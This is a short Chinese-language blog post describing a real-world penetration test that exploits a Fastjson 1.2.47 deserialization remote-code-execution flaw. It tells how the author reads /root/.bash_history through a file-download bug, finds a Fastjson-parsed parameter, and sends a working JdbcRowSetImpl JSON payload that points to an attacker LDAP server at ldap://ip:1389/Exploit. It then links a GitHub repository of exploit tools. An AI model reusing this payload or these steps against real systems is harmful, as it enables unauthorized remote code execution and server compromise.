Fastjson <= 1.2.47 RCE实战运用

0x00

护网出现的漏洞,Fastjson先后爆出了好几个类似的远程命令执行漏洞,这次终于能用上了。

依旧是工作渗透时遇到的系统,发现任意文件下载以后,通过/root/.bash_history找到源码备份文件路径,下载得到源码,分析之,引用Fastjson 1.2.47,开搞。

0x01

作为菜鸡,在做渗透的时候需要快速的拿下目标,是没有时间让你研究原理的,只好在网上找各种各样的自动化工具,然鹅并没有。

先通过源码,找到调用Fastjson的功能,这里找到一个/submit,接收参数param,并带入Fastjson解析。

找台服务器用nc监听端口流量,然后使用Payload测试能不能外连。

param={"name":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"x":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://ip:1389/Exploit","autoCommit":true}}}
外连成功

0x02

确定能外连以后,开始准备LDAP服务器和Exploit。

下载工具和Exploit: https://github.com/CaijiOrz/fastjson-1.2.47-RCE

使用方法我都写在这个Github项目里了。。然后就不想写博客了🙄

发表评论

电子邮件地址不会被公开。 必填项已用*标注